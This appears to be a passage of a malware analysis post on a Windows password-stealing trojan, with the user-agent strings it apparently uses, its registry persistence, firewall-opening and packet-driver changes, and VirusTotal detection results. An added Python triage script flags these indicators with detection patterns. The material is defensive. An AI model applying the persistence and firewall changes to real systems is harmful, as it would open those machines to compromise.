  11. Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5
  12. Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
  13. Mozilla/5.0 (X11; I; SunOS sun4u; en-GB; rv:1.7.8) Gecko/20050713 Firefox/1.0.4
  14. Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041222 Firefox/1.0 (Debian package 1.0-4)
  15. Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7) Gecko/20041103 Firefox/0.9.3
  16. Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; fr; rv:1.7) Gecko/20040624 Firefox/0.9
  17. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)
  18. Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 1.1.4322; Tablet PC 2.0; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MS-RTC LM 8; InfoPath.3)
  19. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.21022)
  20. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
  21. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)
  22. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
  23. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
  24. Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)
  25. Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)
  26. Mozilla/2.0 (compatible; MSIE 3.0; Windows 3.1)
  27. Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)
  28. Microsoft Internet Explorer/1.0 (Windows 95)
System Changes
  • Sets itself to load when Windows starts:
    MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Changes Internet Explorer's default home page
    HKU\S-1-5-21-1715567821-1275210071-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\UserPlayedActive: "DIhnDzXVnPDA+DO4Z72Q5BeL4OTOAPYBa9ef262UWrJ7soV07MpOXsWicda8NBA0tg=="
  • Makes Windows firewall changes:
    HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"
    HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"
  • Service created: SERVICES\NPF (the WinPcap service, "WinPcap Packet Driver (NPF)")
  • The original file is copied to:
    C:\WINDOWS\Temp\temp18.exe
    C:\WINDOWS\Temp\kb778817.exe -- deleted
    C:\WINDOWS\Temp\tmp.exe -- deleted
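A defender-side triage of the registry changes listed above, as an added example that is not from the original post: it parses sandbox registry lines in the quoted 'KEY: "value"' layout (an assumed format) and flags the Run-key persistence, the wildcard-scope GloballyOpenPorts entries and the NPF service, while skipping a constructed benign firewall rule. The allow-list of expected rule names is an assumption for the demo.

```python
"""Triage of sandbox registry-change lines for the persistence, firewall and
driver-service indicators described above.

Added example, not from the original post. Input lines are assumed to look
like the sandbox output quoted above: a registry path, optionally followed
by ': "value"'. The GloballyOpenPorts value layout port:proto:scope:state:name
is the Windows XP/2003 firewall format; the allow-list of expected rule names
is an assumption for the demo.
"""
import re

OPEN_PORTS_RE = re.compile(r"FirewallPolicy\\\w+Profile\\GloballyOpenPorts\\List\\", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\[^\\]*)?$", re.I)
NPF_SERVICE_RE = re.compile(r"\\Services\\NPF$", re.I)
EXPECTED_RULE_NAMES = {"File and Printer Sharing", "Remote Desktop"}  # assumed baseline

# Constructed input: lines 1-3 and 5 are the entries quoted in the post;
# the 3389/TCP line is a constructed benign rule for contrast.
SAMPLE_LINES = [
    r"MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: "80:TCP:*:Enabled:Promo"',
    r'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\53:UDP: "53:UDP:*:Enabled:Promo"',
    r'HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP: "3389:TCP:LocalSubNet:Enabled:Remote Desktop"',
    r"HKLM\SYSTEM\CurrentControlSet\Services\NPF",
]


def split_line(line):
    """Split 'KEY: "VALUE"' into (key, value); value is None when absent."""
    line = line.strip()
    if ': "' in line and line.endswith('"'):
        key, value = line.rsplit(': "', 1)
        return key, value[:-1]
    return line, None


def parse_open_port(value):
    """Parse 'port:proto:scope:state:name'; scope '*' means any remote address."""
    parts = value.split(":", 4)
    if len(parts) != 5 or not parts[0].isdigit():
        return None
    port, proto, scope, state, name = parts
    return {"port": int(port), "proto": proto.upper(), "scope": scope,
            "enabled": state.lower() == "enabled", "name": name}


def triage(lines):
    """Return (category, detail) findings; benign firewall rules are skipped."""
    findings = []
    for raw in lines:
        key, value = split_line(raw)
        if not key:
            continue
        if OPEN_PORTS_RE.search(key) and value is not None:
            rule = parse_open_port(value)
            # An enabled rule open to any address under an unexpected name is
            # the "Promo" pattern from the post.
            if rule and rule["enabled"] and rule["scope"] == "*" \
                    and rule["name"] not in EXPECTED_RULE_NAMES:
                findings.append(("firewall_hole",
                                 f'{rule["port"]}/{rule["proto"]} open to any address as "{rule["name"]}"'))
        elif RUN_KEY_RE.search(key):
            findings.append(("persistence", key))
        elif NPF_SERVICE_RE.search(key):
            findings.append(("packet_capture_driver", key))
    return findings


if __name__ == "__main__":
    for category, detail in triage(SAMPLE_LINES):
        print(f"{category:22} {detail}")
```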

Virustotal results of 0c921935f0880b5c2161b3905f8a3069

SHA256: 55885d1928d39600ce3d99617072bf3632db94352fed8032bc3dce3afe665740
SHA1: 05ca64ccfa582e7787d0238f82336a079aba8419
MD5: 0c921935f0880b5c2161b3905f8a3069
File size: 62.5 KB ( 64036 bytes )
File type: Win32 EXE
Tags: peexe
Detection ratio: 23 / 46
Analysis date: 2013-02-06 20:08:42 UTC ( 4 days, 2 hours ago )
Agnitum Trojan.PWS.Tepfer!CPwnyKhdTDg 20130206
AhnLab-V3 Downloader/Win32.Agent 20130206
AntiVir TR/Crypt.XPACK.Gen2 20130206
Avast Win32:Dropper-gen [Drp] 20130206
AVG Win32/Cryptor 20130206
BitDefender Gen:Variant.Kazy.137742 20130206
Comodo TrojWare.Win32.Kryptik.ASEW 20130206
DrWeb Trojan.DownLoader6.380 20130206
ESET-NOD32 a variant of Win32/Kryptik.ASFO 20130206
F-Secure Gen:Variant.Kazy.137742 20130206
Fortinet W32/Kryptik.XUW!tr 20130206
GData Gen:Variant.Kazy.137742 20130206
Ikarus Trojan-PWS.Win32.Tepfer 20130206
Kaspersky Trojan-PSW.Win32.Tepfer.emee 20130206
Kingsoft Win32.Troj.Generic.a.(kcloud) 20130204
McAfee Artemis!0C921935F088 20130206
McAfee-GW-Edition Artemis!0C921935F088 20130206
MicroWorld-eScan Gen:Variant.Kazy.137742 20130206
NANO-Antivirus Trojan.Win32.Kryptik.bevkem 20130206
Norman Kelihos.DA 20130206
Panda Suspicious file 20130206
VBA32 SScope.Trojan.SB.01722 20130206
VIPRE Trojan.Win32.Generic!BT 20130206